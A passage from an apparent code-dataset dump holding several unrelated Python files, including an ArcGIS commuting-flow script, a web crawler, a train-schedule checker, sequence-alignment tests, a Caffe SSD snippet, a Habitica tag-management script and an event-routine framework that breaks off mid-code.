识别区域后的格网点数据\r\n arcpy.Identity_analysis(mobilePointFeature, regionBoundaryFeature, identifyPointFeatures)\r\n print(\"点区域识别 -- 100%\")\r\n # 添加和区域码相同的底端,表示工作格网区域码、居住格网区域码\r\n # Local variables:\r\n\r\n workRegionIDFieldStr = \"WORK_ID_\" + regionIDFieldStr # 工作地区域代码字段\r\n homeRegionIDFieldStr = \"HOME_ID_\" + regionIDFieldStr # 居住地区域代码字段\r\n arcpy.AddField_management(identifyPointFeatures, workRegionIDFieldStr, \"TEXT\")\r\n arcpy.AddField_management(identifyPointFeatures, homeRegionIDFieldStr, \"TEXT\")\r\n # Process: 计算字段\r\n calculateFieldExpression = \"[\" + regionIDFieldStr + \"]\" # 工作、居住地区域代码均等于区域代码\r\n arcpy.CalculateField_management(identifyPointFeatures, workRegionIDFieldStr, calculateFieldExpression, \"VB\", \"\")\r\n arcpy.CalculateField_management(identifyPointFeatures, homeRegionIDFieldStr, calculateFieldExpression, \"VB\", \"\")\r\n\r\n # 连接统计表格与识别区域后要素图层\r\n print(\"流向数据连接要素...\")\r\n\r\n idJoinKeepFields_Work = [workRegionIDFieldStr]\r\n idJoinKeepFields_Home = [homeRegionIDFieldStr]\r\n\r\n # 为工作地居住地流向及居住地工作地流向表格中的格网添加行政区域信息,并根据流出地-流入地(行政区域)进行汇总,得到一个流向转移矩阵\r\n # 分类汇总Work 2 Home\r\n arcpy.JoinField_management(work2HomeTable, workGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Work)\r\n arcpy.JoinField_management(work2HomeTable, homeGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Home)\r\n sWork2HomeFieldsList = [WORK_NUM]\r\n caseW2HFields = [workRegionIDFieldStr, homeRegionIDFieldStr]\r\n work2HomeTableSum = statsGrid.summaryStatisticsGrid2Region(work2HomeTable, sWork2HomeFieldsList, \"SUM\",\r\n 
caseW2HFields)\r\n # 分类汇总Home 2 Work\r\n arcpy.JoinField_management(home2WorkTable, homeGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Home)\r\n arcpy.JoinField_management(home2WorkTable, workGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Work)\r\n\r\n sHome2WorkFieldsList = [HOME_NUM]\r\n caseH2WFields = [homeRegionIDFieldStr, workRegionIDFieldStr]\r\n home2WorkTableSum = statsGrid.summaryStatisticsGrid2Region(home2WorkTable, sHome2WorkFieldsList, \"SUM\",\r\n caseH2WFields)\r\n\r\n # 汇总总体grid_WH 每个行政区内工作和居住的总人数\r\n arcpy.JoinField_management(grid_WH, grid_ID,\r\n identifyPointFeatures, identifyPointJoinField, [regionIDFieldStr])\r\n sFieldsList = [WORK_NUM, HOME_NUM]\r\n caseRegionFields = [regionIDFieldStr]\r\n grid_WHSum = statsGrid.summaryStatisticsGrid2Region(grid_WH, sFieldsList, \"SUM\", caseRegionFields)'''\r\n\r\n # 将表格数据导入到SHAPE文件中\r\n # 生成W2H OD数组[内,外]\r\n workRegionIDFieldStr = \"WORK_ID_\" + regionIDFieldStr # 工作地区域代码字段\r\n homeRegionIDFieldStr = \"HOME_ID_\" + regionIDFieldStr # 居住地区域代码字段\r\n work2HomeTableSum = \"W2H_Stats_SUM\"\r\n home2WorkTableSum = \"H2W_Stats_SUM\"\r\n grid_WHSum = \"WH_Stats_SUM\"\r\n statsW2HNumField = \"SUM_\" + WORK_NUM\r\n statsW2HODObj = statsGrid.statsWorkAndHomeOD(work2HomeTableSum, workRegionIDFieldStr, homeRegionIDFieldStr,\r\n statsW2HNumField)\r\n # 生成H2W OD数组[内,外]\r\n statsH2WNumField = \"SUM_\" + HOME_NUM\r\n statsH2WODObj = statsGrid.statsWorkAndHomeOD(home2WorkTableSum, homeRegionIDFieldStr, workRegionIDFieldStr,\r\n statsH2WNumField)\r\n # 计算指标\r\n WHBalanceQuota = statsGrid.calculateJobs_HousingBalance(regionBoundaryFeature, regionIDFieldStr,\r\n grid_WHSum, regionIDFieldStr,\r\n statsW2HNumField, statsH2WNumField,\r\n statsW2HODObj, statsH2WODObj)\r\n\r\nexcept Exception as err:\r\n print(err.args[0])\r\n","sub_path":"statistics/OperateOD_1.py","file_name":"OperateOD_1.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368432693","text":"import xml.etree.ElementTree as ElementTree\nfrom threading import Thread\nfrom slugify import slugify\n\nfrom .parser import Parser\nfrom .requester import Requester\nfrom .filer import Filer\nfrom .logger import Logger\n\n\nclass Crawler:\n\n requester = None\n filer = None\n parser = None\n logger = None\n\n def __init__(self, config_file_path, output_path):\n self.requester = Requester()\n self.filer = Filer()\n self.logger = Logger('crawler')\n self.output_path = output_path if output_path else '.'\n\n thread = None\n\n for site in self.set_requests(Crawler, config_file_path):\n thread = Thread(target=self.crawl, args=(site,))\n thread.start()\n\n if thread:\n thread.join()\n\n def crawl(self, site):\n index_content = self.requester.get_content(site.get('domain'))\n\n if len(index_content) > 0:\n self.filer.prepare_csv(self.output_path + '/' + slugify(site.get('name')) + '.csv',\n (info.get('name') for info in site.find('page').findall('info')))\n\n thread = None\n \n for page_link in self.get_pages_links(Crawler, site.get('domain'), site.find('page'), index_content):\n thread = Thread(target=self.threaded_crawl, args=(site, page_link,))\n thread.start()\n\n if thread:\n thread.join()\n else:\n self.logger.log_warning('No content found in ' + site.get('domain'))\n \n def threaded_crawl(self, site, page_link):\n page_content = self.requester.get_content(page_link)\n\n if len(page_content) > 0:\n page_infos = self.get_page_infos(Crawler, 
site.find('page'), page_link, page_content)\n            self.filer.write_content(self.output_path + '/' + slugify(site.get('name')) + '.csv',\n                                     page_infos + '\\n', 'a')\n        else:\n            self.logger.log_warning('No content found in ' + page_link)\n\n    @staticmethod\n    def set_requests(cls, config_file_path):\n        config_file = ElementTree.parse(config_file_path)\n        config_file_root_node = config_file.getroot()\n        data = []\n\n        for index, site in enumerate(config_file_root_node.findall('site')):\n            data.append(site)\n\n        return data\n\n    @staticmethod\n    def get_pages_links(cls, domain, page, index_content):\n        parser = Parser(index_content)\n        pages_links = []\n        \n        for match in parser.get_all_by_regex(page.get('uripattern')):\n\n            if isinstance(match, tuple):\n                pages_links.append(domain + match[0])\n            else:\n                pages_links.append(domain + match)\n\n        return set(pages_links)\n\n    @staticmethod\n    def get_page_infos(cls, page, link, page_content):\n        parser = Parser(page_content)\n        page_infos = '' \n\n        for info in parser.page_parser(page):\n            page_infos += info + ','\n        \n        return page_infos + link\n","sub_path":"webcrawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503496455","text":"import pandas as pd\nfrom datetime import time\n\nflag = True\nwhile flag:\n\n    # train information\n    a = [{'train_code': '887B', 'station': 'Lipki', 'time_arrive': time(12, 00)},\n         {'train_code': '411C', 'station': 'Kyiv ', 'time_arrive': time(10, 00)},\n         {'train_code': '743L', 'station': 'Lipki', 'time_arrive': time(12, 00)},\n         {'train_code': '113F', 'station': 'Rivne', 'time_arrive': time(11, 00)}]\n\n    # enter the time range for arriving trains\n\n    while True:\n        try:\n            start_time = time(hour=int(input(\"Enter start hours: \")), minute=int(input(\"Enter start minutes: \")))\n            end_time = time(hour=int(input(\"Enter last hours: \")), minute=int(input(\"Enter last minutes: \")))\n            break\n        except ValueError:\n            print('Enter an integer!')\n    s = sorted(a, key=lambda x: x['time_arrive'])\n\n    # check which trains' arrivals fall within the given range\n\n    for train in s:\n        if start_time <= train.get('time_arrive') <= end_time:\n            print(train)\n    df = pd.DataFrame(a)\n    res = df.groupby([\"time_arrive\", \"station\"]).filter(lambda x: len(x) > 1)\n    count = len(res)\n\n    # if some routes arrive at the same station at the same time, report an error and ask for new input\n\n    for i in res[\"time_arrive\"].to_list():\n\n        if (start_time <= i <= end_time) and (count >= 2):\n            print(f'There are {count} wrong destinations')\n            
print('Conflict detected. Please choose another time range.')\n            break\n\n    # if there are no \"conflicting routes\", stop the program\n\n    else:\n        flag = False\n        break\n","sub_path":"1.4.2_pandas(fixed).py","file_name":"1.4.2_pandas(fixed).py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414762079","text":"import os\nimport sys\nsys.path.append(\"../../bin\")\nimport MSA_cleaning as MSA\nimport random\nimport Mantel_test as Mantel\n\n#see experiment description in the associated report\n\n#dictionary of codons used for generating random DNA chains\ngencode = {\n    'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n    'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n    'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n    'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n    'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n    'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n    'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n    'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n    'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n    'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n    'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n    'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n    'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n    'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n    'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',\n    'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}\n    \n    \n#data control\ndef check_data(filename):\n    filecontent = open(filename,\"r\").read()\n    seqs = filecontent.split('>')[1:]\n    for seq in seqs:\n        aaseq = seq.split(\"\\n\")[1]\n        #check sequence length\n        if len(aaseq)<50:\n            return False\n        #check sequence composition\n        for aa in aaseq:\n            if aa!='-' and aa not in gencode.values():\n                return False\n    return True\n\n#We test basic cases in further experiment (1, 2 and 3)\ndef check_trivial(filename):\n    pass\n\n#generation of sequences presenting basic noise characteristics\n#first col has more than 50% indel\n#col 10 has more than 50% uniq aa\n#last col : no aa appears more than twice\ndef check_basic_synth():\n    seq1=\"\".join([\"A\"]*30)\n    seq2='-'+seq1[:-1]\n    seq2=list(seq2)\n    seq2[10]=\"L\"\n    seq2[-1]=\"L\"\n    seq2=\"\".join(seq2)\n    seq3='-'+seq1[:-1]\n    seq3=list(seq3)\n    seq3[10]=\"C\"\n    seq3[-1]=\"L\"\n    seq3=\"\".join(seq3)\n    seq4='-'+seq1[:-1]\n    seq4=list(seq4)\n    seq4[10]=\"D\"\n    seq4=\"\".join(seq4)\n    print(seq1)\n    print(seq2)\n    print(seq3)\n    print(seq4)\n    filetest=open(\"test.txt\",'w')\n    filetest.write(\">seq1\\n\" + seq1 + '\\n'+ \">seq2\\n\"+seq2 + '\\n' +\">seq3\\n\"+ seq3 + '\\n' +\">seq4\\n\" +seq4)\n    filetest.close()\n    a=MSA.MSA_cleaning(\"test.txt\", None)\n    a.treatmsa()\n    print(a.alignment)\n    os.remove(\"test.txt\")\n\n\n#generate random msa, to see what kind of random tree and random pearson coeff \n#we obtain comparing to real MSA\ndef check_advance_synth():\n    def gen_aleat_seqs():\n        seqs=[]\n        #first aa for the 16 seqs of the msa\n        for i in range(16):\n            aa=random.choice(list(gencode.values()))\n            if (aa=='_'):\n                aa='-'\n            seqs.append([aa])\n        for i in range(200):\n            for i in range(16):\n                aa=random.choice(list(gencode.values()))\n                if aa=='_': aa='-'\n                seqs[i].append(aa)\n        return [\"\".join(seq) for seq in seqs]\n    \n    filetest=open(\"testMSA1.txt\",'w')\n    filetest2=open(\"testMSA2.txt\",'w')\n    for i, seq in enumerate(gen_aleat_seqs()):\n        filetest.write(\">seq\"+str(i)+\"\\n\" + seq + \"\\n\")\n    filetest.close()\n    for i, seq in enumerate(gen_aleat_seqs()):\n        filetest2.write(\">seq\"+str(i)+\"\\n\" + seq + \"\\n\")\n    filetest2.close()\n    msa1=MSA.MSA_cleaning(\"testMSA1.txt\", 
None)\n msa2=MSA.MSA_cleaning(\"testMSA2.txt\", None)\n tree1, dm1 = msa1.buildtree(msa1.alignment)\n tree2, dm2 = msa2.buildtree(msa2.alignment)\n tree1.ladderize()\n tree2.ladderize()\n tree1 = MSA.gettreetext(tree1)\n tree2 = MSA.gettreetext(tree2)\n cond_dm1 = msa1.cond_mat(dm1)\n cond_dm2 = msa2.cond_mat(dm2)\n pears = Mantel.MantelTest(cond_dm1, cond_dm2, randomizations=100)\n print(\"random tree 1 \\n\" + tree1)\n print(\"random tree 2 \\n\" +tree2)\n print(\"correlation \" + str(pears[0]))\n os.remove(\"testMSA1.txt\")\n os.remove(\"testMSA2.txt\")\n\n#test small amount of data in further experiment (1, 2 and 3)\ndef check_small(filename):\n pass\n \n#create a list of all the data files of a given folder \ndef listfile():\n liste = []\n for i in range(1,10): liste.append(\"s00\"+str(i)+\".align.1.msl\")\n for i in range(10, 100): liste.append(\"s0\"+str(i)+\".align.1.msl\")\n for i in range(100, 301): liste.append(\"s\"+str(i)+\".align.1.msl\")\n return liste\n\n#run the data test on all the files of a given folder\ndef runfolder(folderpath):\n liste = listfile()\n return [check_data(folderpath+'/'+name) for name in liste]\n\n#run all the test on all the files\ndef runall(genfolderpath):\n check_basic_synth()\n check_advance_synth()\n result=[]\n for namefolder in os.listdir(genfolderpath):\n result.append(runfolder(genfolderpath+'/'+namefolder))\n for folder in result:\n if False in folder:\n return \"Wrong data !\"\n return \"Data alright\"\n\nprint(runall(\"../../data\"))\n\n \n","sub_path":"results/controls/runall.py","file_name":"runall.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534061425","text":"import sys\nimport numpy as np\nsys.path.insert(0, '/data2/obj_detect/ssd/caffe/python')\nimport caffe\nssd_pt = '/home/ky/obj_detect/ssd/py-ssd/models/debug_prior_layer/debug.prototxt'\nssd_md = '/home/ky/obj_detect/ssd/caffe/pretrain/models/VGGNet/VOC0712/SSD_300x300_ft/VGG_VOC0712_SSD_300x300_ft_iter_120000.caffemodel'\nssd_net = caffe.Net(ssd_pt, ssd_md, caffe.TEST)\nconv4_norm_blob = np.random.rand(1, 512, 38, 38).astype(np.float32)\ndata_blob = np.random.rand(1, 3, 300, 300).astype(np.float32)\n\nssd_net.blobs['data'].data[...] = data_blob\nssd_net.blobs['conv4_norm'].data[...] 
= conv4_norm_blob\n\nssd_net.forward()\nprior_data = ssd_net.blobs['conv4_3_norm_mbox_priorbox'].data\nnp.save('./prior.npy', prior_data)\n\n\n","sub_path":"caffe2/python/ssd_test/ssd_prior.py","file_name":"ssd_prior.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85183878","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport requests\nimport sys\nfrom collections import Counter\nimport time\n\n\nclass Debug(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n import pdb; pdb.set_trace()\n\n# MAIN\nparser = argparse.ArgumentParser(description=\"Dumps your tasks to a file user-tasks.json in the current directory\")\nparser.add_argument('-o', '--outfile',\n type=argparse.FileType('w'), default=\"user-tasks.json\",\n help='JSON data file (default: user-tasks.json)')\nparser.add_argument('-u', '--user-id',\n help='From https://habitica.com/#/options/settings/api\\n \\\n default: environment variable HAB_API_USER')\nparser.add_argument('-k', '--api-token',\n help='From https://habitica.com/#/options/settings/api\\n \\\n default: environment variable HAB_API_TOKEN')\nparser.add_argument('--baseurl',\n type=str, default=\"https://habitica.com\",\n help='API server (default: https://habitica.com)')\nparser.add_argument('--debug',\n action=Debug, nargs=0,\n help=argparse.SUPPRESS)\nparser.add_argument('-d', '--delete-tag',\n type=str)\nparser.add_argument('-a', '--add-tag',\n type=str)\nparser.add_argument('-t', '--task-id',\n type=str)\nargs = parser.parse_args()\nargs.baseurl += \"/api/v3/\"\n\ntry:\n if args.user_id is None:\n args.user_id = os.environ['HAB_API_USER']\nexcept KeyError:\n print(\"User ID must be set by the -u/--user-id option or by setting the environment variable 'HAB_API_USER'\")\n sys.exit(1)\n\ntry:\n if args.api_token is None:\n args.api_token = os.environ['HAB_API_TOKEN']\nexcept KeyError:\n print(\"API Token must be set by the -k/--api-token option or by setting the environment variable 'HAB_API_TOKEN'\")\n sys.exit(1)\n\nheaders = {\"x-api-user\": args.user_id, \"x-api-key\": args.api_token, \"Content-Type\": \"application/json\"}\nreq = requests.get(args.baseurl + \"tasks/user\", headers=headers)\n# with open(args.outfile, 'w') as f:\n#json.dump(req.json(), args.outfile, separators=(',', ':'), sort_keys=True)\nallTasks= req.json()['data']\npTag=\"0465135b-7652-4aac-8a15-9db5fc9af803\"\ncTag=\"48924274-1ba1-49ba-8dc5-48b0ff225d25\"\ncDelTag = []\ncHasTag = []\ncTasks = []\ncToTag = [] \npDelTag = []\npHasTag= []\npTasks = []\npToTag=[]\n\n\ndef DeleteTag(tasks,tag):\n for counter,item in enumerate(tasks, start=1):\n requests.delete(args.baseurl + \"tasks/\" + item + \"/tags/\" + tag, headers=headers)\n time.sleep(60/30)\n print(counter)\n\n\ndef AddTag(tasks,tag):\n for counter2, item in enumerate(tasks, start=1):\n requests.post(args.baseurl + \"tasks/\" + item + \"/tags/\" + tag, headers=headers)\n time.sleep(60/30)\n print(counter2)\n\ndef getList(theTasks,tag_e):\n list = []\n for task in theTasks:\n for tag in task['tags']:\n if tag == tag_e:\n list.append(task['id'])\n else:\n continue\n return list \n\n# Python code t get difference of two lists\n# Using set()\ndef Diff(li1, li2):\n return list(set(li1) - set(li2)) + list(set(li2) - set(li1))\n\ndef Differ(dict,list):\n newlist=[]\n for item in dict:\n if item['id'] not in list:\n newlist.append(item['id'])\n else: \n continue\n return(newlist)\n\n \nif 
args.task_id:\n    if args.add_tag:\n        print(\"Adding the tag on the task.\")\n        requests.post(args.baseurl + \"tasks/\" + args.task_id + \"/tags/\" + args.add_tag, headers=headers)\n        print(\"Done\")\n    elif args.delete_tag:\n        print(\"Deleting the tag on the task.\")\n        requests.delete(args.baseurl + \"tasks/\" + args.task_id + \"/tags/\" + args.delete_tag, headers=headers)\n        print(\"Done\")\n    if args.delete_tag is None and args.add_tag is None:\n        print(\"Add with the -a/--add-tag or -d/--delete-tag the tag ID you want to add, delete or both to replace.\")\n    \nelse:\n    if args.add_tag and args.delete_tag:\n        print(\"Custom action: replace tags in all tasks\")\n        changeTags = []\n        changeTags = getList(allTasks, args.delete_tag)\n        print(f\"Replacing tag in {len(changeTags)} tasks.\")\n        DeleteTag(changeTags,args.delete_tag)\n        AddTag(changeTags,args.add_tag)\n        print(\"Done\")\n    elif args.add_tag is None and args.delete_tag:\n        print(\"Custom action: delete tag\")\n        deleteTags = []\n        deleteTags = getList(allTasks, args.delete_tag)\n        print(f\"Deleting tag in {len(deleteTags)} tasks.\")\n        # This branch must delete the tag, not add it back\n        DeleteTag(deleteTags,args.delete_tag)\n        print(\"Done\")\n    elif args.add_tag and args.delete_tag is None:\n        print(\"Add with the -a/--add-tag or -d/--delete-tag options the tag ID you want to add, delete, or both to replace. Add with -t/--task-id the task ID you want to tag. \")\n\n    elif args.delete_tag is None and args.add_tag is None:\n        print(\"Default action: add a tag to the challenge tasks and the no-challenge tasks\")\n        for counter1, item in enumerate(allTasks, start=1):\n            myTags = item['tags']\n            task = {}\n            task.update({'id': item['id'], \"tags\": item['tags']})\n            if len(item['challenge']) != 0:\n                cTasks.append(task)\n            else:\n                pTasks.append(task)\n\n        pDelTag=getList(pTasks,cTag)\n        pHasTag=getList(pTasks,pTag)\n        pToTag=Differ(pTasks,pHasTag)\n        cDelTag=getList(cTasks,pTag)\n        cHasTag=getList(cTasks,cTag)\n        cToTag=Differ(cTasks,cHasTag)\n\n        print(f'TOTAL TASKS: {counter1}')\n        print(f'CHALLENGE TASKS: {len(cTasks)} \\nWrong tag: {len(cDelTag)}\\tGood tag: {len(cHasTag)}\\tTo tag: {len(cToTag)}')\n        print(f'PERSONAL TASKS: {len(pTasks)} \\nWrong tag: {len(pDelTag)}\\tGood tag: {len(pHasTag)}\\tTo tag: {len(pToTag)}')\n        input(\"Press Enter to continue...\")\n\n        print(\"Adding challenge tag to tasks...\")\n        AddTag(cToTag,cTag)\n        print(\"Done\")\n        print(\"Deleting wrong tag in challenge tags...\")\n        DeleteTag(cDelTag,pTag)\n        print(\"Done\")\n        print(\"Adding personal tag to tasks...\")\n        AddTag(pToTag,pTag)\n        print(\"Done\")\n        print(\"Deleting wrong tag in personal tasks...\")\n        DeleteTag(pDelTag,cTag)\n        print(\"Done\")\n    \n","sub_path":"replace_tags.py","file_name":"replace_tags.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240544543","text":"'''\nCreated on 2015/6/16\n\n:author: hubo\n'''\nfrom __future__ import print_function, absolute_import, division \nimport sys\nfrom .core import QuitException, TimerEvent, SystemControlEvent\nfrom .event import Event, withIndices\n\nclass EventHandler(object):\n    '''\n    Runnable with an event handler model. \n    '''\n    def __init__(self, scheduler = None, daemon = False):\n        self.handlers = dict()\n        self.scheduler = scheduler\n        self.daemon = daemon\n        self.registered = False\n    def bind(self, scheduler):\n        self.scheduler = scheduler\n    def __iter__(self):\n        '''\n        Keep it like an iterator. Not very useful.\n        '''\n        return self\n    def next(self):\n        '''\n        Keep it like an iterator. 
Not very useful.\n '''\n self.send(None)\n def __next__(self):\n '''\n Python 3 next\n '''\n self.send(None)\n def send(self, etup):\n '''\n Handle events\n '''\n return self.handlers[etup[1]](etup[0], self.scheduler)\n def _setDaemon(self):\n if not self.registered:\n self.registered = True\n self.scheduler.setDaemon(self, self.daemon)\n def registerHandler(self, matcher, handler):\n '''\n Register self to scheduler\n '''\n self.handlers[matcher] = handler\n self.scheduler.register((matcher,), self)\n self._setDaemon()\n def unregisterHandler(self, matcher):\n self.scheduler.unregister((matcher,), self)\n del self.handlers[matcher]\n def unregisterAllHandlers(self):\n self.scheduler.unregister(tuple(self.handlers.keys()), self)\n self.handlers.clear()\n def registerAllHandlers(self, handlerDict):\n '''\n Register self to scheduler\n '''\n self.handlers.update(handlerDict)\n if hasattr(handlerDict, 'keys'):\n self.scheduler.register(handlerDict.keys(), self)\n else:\n self.scheduler.register(tuple(h[0] for h in handlerDict), self)\n self._setDaemon()\n def close(self):\n self.scheduler.unregisterall(self)\n self.registered = False\n def registerExceptionHandler(self, handler):\n self.exceptionHandler = handler\n def registerQuitHandler(self, handler):\n self.quitHandler = handler\n def throw(self, typ, val = None, tb = None):\n if val is None:\n if isinstance(typ, type):\n val = typ()\n else:\n val = typ\n typ = type(val)\n if isinstance(val, QuitException):\n self.quitHandler(self.scheduler)\n else:\n self.exceptionHandler(val, self.scheduler)\n def exceptionHandler(self, val, scheduler):\n raise val\n def quitHandler(self, scheduler):\n raise StopIteration\n\n@withIndices('type', 'routine')\nclass RoutineControlEvent(Event):\n canignore = False\n ASYNC_START = 'asyncstart'\n DELEGATE_FINISHED = 'delegatefinished'\n WAIT = 'wait'\n\nclass IllegalMatchersException(Exception):\n pass\n\nclass generatorwrapper(object):\n '''\n Default __repr__ of a generator is not readable, use a wrapper to improve the readability\n '''\n def __init__(self, run, name = 'iterator', classname = 'routine'):\n self.run = run\n self.name = name\n self.classname = classname\n def __iter__(self):\n return self.run\n def next(self):\n return next(self.run)\n def __next__(self):\n return next(self.run)\n def send(self, arg):\n return self.run.send(arg)\n def throw(self, typ, val = None, tb = None):\n return self.run.throw(typ, val, tb)\n def __repr__(self, *args, **kwargs):\n try:\n iterator = self.run.gi_frame.f_locals[self.name]\n try:\n return '<%s %r of %r at 0x%016X>' % (self.classname, iterator,\n iterator.gi_frame.f_locals['self'],\n id(iterator))\n except:\n return '<%s %r at 0x%016X>' % (self.classname, iterator, id(iterator))\n except:\n return repr(self.run)\n def close(self):\n return self.run.close()\n\ndef Routine(iterator, scheduler, asyncStart = True, container = None, manualStart = False, daemon = False):\n def run():\n iterself, re = yield\n rcMatcher = RoutineControlEvent.createMatcher(RoutineControlEvent.ASYNC_START, iterself)\n if manualStart:\n yield\n try:\n if asyncStart:\n scheduler.register((rcMatcher,), iterself)\n (event, m) = yield\n event.canignore = True\n scheduler.unregister((rcMatcher,), iterself)\n if container is not None:\n container.currentroutine = iterself\n if daemon:\n scheduler.setDaemon(iterself, True)\n matchers = next(iterator)\n try:\n scheduler.register(matchers, iterself)\n except:\n iterator.throw(IllegalMatchersException(matchers))\n raise\n while True:\n try:\n 
etup = yield\n except:\n #scheduler.unregister(matchers, iterself)\n lmatchers = matchers\n t,v,tr = sys.exc_info() # @UnusedVariable\n if container is not None:\n container.currentroutine = iterself\n matchers = iterator.throw(t,v)\n else:\n #scheduler.unregister(matchers, iterself)\n lmatchers = matchers\n if container is not None:\n container.event = etup[0]\n container.matcher = etup[1]\n if container is not None:\n container.currentroutine = iterself\n matchers = iterator.send(etup)\n try:\n scheduler.unregister(set(lmatchers).difference(matchers), iterself)\n scheduler.register(set(matchers).difference(lmatchers), iterself)\n except:\n iterator.throw(IllegalMatchersException(matchers))\n raise\n finally:\n if asyncStart:\n re.canignore = True\n scheduler.ignore(rcMatcher)\n if container is not None:\n container.currentroutine = iterself\n iterator.close()\n scheduler.unregisterall(iterself)\n r = generatorwrapper(run())\n next(r)\n if asyncStart:\n re = RoutineControlEvent(RoutineControlEvent.ASYNC_START, r)\n r.send((r, re))\n waiter = scheduler.send(re)\n if waiter is not None:\n # This should not happen regularly\n def latencyStart(w):\n while w:\n yield (w,)\n w = scheduler.send(re)\n Routine(latencyStart(waiter), scheduler, False)\n else:\n r.send((r, None))\n return r\n\nclass RoutineException(Exception):\n def __init__(self, matcher, event):\n Exception.__init__(self, matcher, event)\n self.matcher = matcher\n self.event = event\n\nclass MultipleException(Exception):\n def __init__(self, exceptions):\n Exception.__init__(self, '%d exceptions occurs in parallel execution' % (len(exceptions),) \\\n + ': ' + repr(exceptions[0]) + ', ...')\n self.exceptions = exceptions\n\nclass RoutineContainer(object):\n def __init__(self, scheduler = None, daemon = False):\n self.scheduler = scheduler\n self.daemon = daemon\n def bind(self, scheduler):\n self.scheduler = scheduler\n def main(self):\n raise NotImplementedError\n def start(self, asyncStart = False):\n r = Routine(self.main(), self.scheduler, asyncStart, self, True, self.daemon)\n self.mainroutine = r\n try:\n next(r)\n except StopIteration:\n pass\n return r\n def subroutine(self, iterator, asyncStart = True, name = None, daemon = False):\n r = Routine(iterator, self.scheduler, asyncStart, self, True, daemon)\n if name is not None:\n setattr(self, name, r)\n # Call subroutine may change the currentroutine, we should restore it\n currentroutine = getattr(self, 'currentroutine', None)\n try:\n next(r)\n except StopIteration:\n pass\n self.currentroutine = currentroutine\n return r\n def terminate(self, routine = None):\n if routine is None:\n routine = self.mainroutine\n routine.close()\n def close(self):\n self.terminate()\n def waitForSend(self, event):\n '''\n Can call without delegate\n '''\n waiter = self.scheduler.send(event)\n while waiter:\n yield (waiter,)\n waiter = self.scheduler.send(event)\n def waitWithTimeout(self, timeout, *matchers):\n if timeout is None:\n yield matchers\n self.timeout = False\n else:\n th = self.scheduler.setTimer(timeout)\n try:\n tm = TimerEvent.createMatcher(th)\n yield tuple(matchers) + (tm,)\n if self.matcher is tm:\n self.timeout = True\n else:\n self.timeout = False\n finally:\n self.scheduler.cancelTimer(th)\n def executeWithTimeout(self, timeout, subprocess):\n if timeout is None:\n for m in subprocess:\n yield m\n self.timeout = False\n else:\n th = self.scheduler.setTimer(timeout)\n try:\n tm = TimerEvent.createMatcher(th)\n try:\n for m in self.withException(subprocess, tm):\n yield 
m\n self.timeout = False\n except RoutineException as exc:\n if exc.matcher is tm:\n self.timeout = True\n else:\n raise\n finally:\n self.scheduler.cancelTimer(th)\n subprocess.close()\n def doEvents(self):\n '''\n Can call without delegate\n '''\n self.scheduler.wantContinue()\n cm = SystemControlEvent.createMatcher(SystemControlEvent.CONTINUE)\n yield (cm,)\n def withException(self, subprocess, *matchers):\n try:\n for m in subprocess:\n yield tuple(m) + tuple(matchers)\n if self.matcher in matchers:\n raise RoutineException(self.matcher, self.event)\n finally:\n subprocess.close()\n def withCallback(self, subprocess, callback, *matchers):\n try:\n for m in subprocess:\n while True:\n yield tuple(m) + tuple(matchers)\n if self.matcher in matchers:\n callback(self.event, self.matcher)\n else:\n break\n finally:\n subprocess.close()\n \n def waitForEmpty(self, queue):\n '''\n Can call without delegate\n '''\n while True:\n m = queue.waitForEmpty()\n if m is None:\n break\n else:\n yield (m,)\n def waitForAll(self, *matchers):\n eventdict = {}\n eventlist = []\n self.scheduler.register(matchers, self.currentroutine)\n try:\n ms = len(matchers)\n while ms:\n yield ()\n self.scheduler.unregister((self.matcher,), self.currentroutine)\n ms -= 1\n eventlist.append(self.event)\n eventdict[self.matcher] = self.event\n self.eventlist = eventlist\n self.eventdict = eventdict\n except:\n self.scheduler.unregister(matchers, self.currentroutine)\n raise\n def waitForAllToProcess(self, *matchers):\n eventdict = {}\n eventlist = []\n self.scheduler.register(matchers, self.currentroutine)\n try:\n ms = len(matchers)\n while ms:\n yield ()\n self.event.canignore = True\n self.scheduler.unregister((self.matcher,), self.currentroutine)\n ms -= 1\n eventlist.append(self.event)\n eventdict[self.matcher] = self.event\n self.eventlist = eventlist\n self.eventdict = 